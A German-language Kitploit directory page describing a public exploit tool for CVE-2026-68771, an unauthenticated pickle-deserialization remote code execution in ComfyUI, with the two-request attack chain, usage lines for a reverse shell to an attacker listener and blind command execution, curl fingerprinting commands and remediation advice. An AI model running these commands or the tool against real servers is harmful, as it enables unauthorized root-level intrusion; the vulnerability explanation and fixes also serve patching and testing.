Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-68771_exploit — Nicht authentifizierter Exploit für CVE-2026-68771, eine Pickle-Deserialisierungs-RCE in ComfyUI. Hinterlegt einen manipulierten Shard über /upload/image, löst ihn über /prompt aus und führt Befehle aus oder öffnet eine Reverse Shell. | Kitploit
Tools/GitHubGitHub/0xdak/cve-2026-68771_exploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHub0xdak/cve-2026-68771_exploit

CVE-2026-68771_exploit

Nicht authentifizierter Exploit für CVE-2026-68771, eine Pickle-Deserialisierungs-RCE in ComfyUI. Hinterlegt einen manipulierten Shard über /upload/image, löst ihn über /prompt aus und führt Befehle aus oder öffnet eine Reverse Shell.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 18 TagenNoch nicht geprüft

CVE-2026-68771 — ComfyUI RCE durch nicht authentifizierte Pickle-Deserialisierung

Nicht authentifizierte Remote-Codeausführung in ComfyUI über den LoadTrainingDataset-Knoten.

LoadTrainingDataset.execute() lädt Dataset-Shards aus dem Ausgabeverzeichnis des Servers mit torch.load(f) und ohne weights_only=True. Bei PyTorch < 2.6 (wo weights_only standardmäßig False ist) führt ein manipuliertes shard_*.pkl beim Laden sein Pickle-__reduce__ aus (CWE-502). ComfyUI wird ohne Authentifizierung ausgeliefert, und die /upload/image-Route (mit type=output) schreibt die rohen hochgeladenen Bytes ohne Überprüfung der Dateiendung, sodass eine .pkl-Datei abgelegt und dann in zwei nicht authentifizierten Anfragen ausgelöst werden kann.

  • Betroffen: ComfyUI 0.23.0 auf PyTorch < 2.6
  • Standardport: 8188 (nicht authentifiziert)
  • CWE: 502 (Deserialisierung nicht vertrauenswürdiger Daten)
  • Auswirkung: RCE als der Benutzer des ComfyUI-Prozesses (normalerweise root)

Requirements

Nur die Python-3-Standardbibliothek — keine Abhängigkeiten.

Usage

root@kitploit:~
# reverse shell (start a listener first: nc -lvnp 4444)
python3 exploit.py http://10.10.10.10:8188/ --shell 10.10.14.5:4444

# blind single command
python3 exploit.py http://10.10.10.10:8188/ -c 'id > /tmp/pwned'

Der Befehl wird auf dem Server ausgeführt; seine Ausgabe wird nicht zurückgegeben. Verwenden Sie daher --shell für eine Reverse-Shell (oder schreiben Sie in einen lesbaren Pfad), um das Ergebnis zu sehen.

How it works

Zwei nicht authentifizierte Anfragen:

  1. Ablegen — POST /upload/image mit type=output, subfolder=training_dataset, Dateiname shard_0000.pkl. Die /upload/image-Route schreibt die rohen Bytes (keine Bildverarbeitung auf diesem Pfad), sodass das Pickle unverändert unter output/training_dataset/shard_0000.pkl landet. Das __reduce__ des Pickles gibt (os.system, (cmd,)) zurück.

  2. Auslösen — POST /prompt mit einem Workflow: ein LoadTrainingDataset-Knoten (folder_name=training_dataset), der mit einem SaveLatent-Ausgabeknoten verbunden ist. Der Ausgabeknoten zwingt ComfyUI, LoadTrainingDataset auszuführen, das per Glob auflistet und aufruft:

Identifying a target

root@kitploit:~
curl -s http://10.10.10.10:8188/system_stats | python3 -c "import sys,json;print(json.load(sys.stdin)['system']['comfyui_version'])"
# 0.23.0
curl -s -o /dev/null -w '%{http_code}\n' http://10.10.10.10:8188/object_info/LoadTrainingDataset
# 200  -> vulnerable node present

Behebung

  • Upstream-Fix: Shards mit torch.load(f, weights_only=True) laden.
  • PyTorch auf >= 2.6 aktualisieren, wo weights_only standardmäßig True ist und der eingeschränkte Unpickler os.system ablehnt.
  • Setzen Sie ComfyUI niemals über ungesicherte Netzwerke ein und führen Sie es nicht als privilegierter Benutzer aus.

Haftungsausschluss

Nur für autorisierte Sicherheitstests und zu Bildungszwecken. Verwenden Sie es ausschließlich gegen Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche Testberechtigung haben.

Tool herunterladen
shard_*.pkl
root@kitploit:~
with open(shard_path, "rb") as f:
    shard_data = torch.load(f)      # no weights_only=True -> runs the pickle on torch < 2.6

Das __reduce__ des Pickles führt während der Deserialisierung os.system(cmd) aus.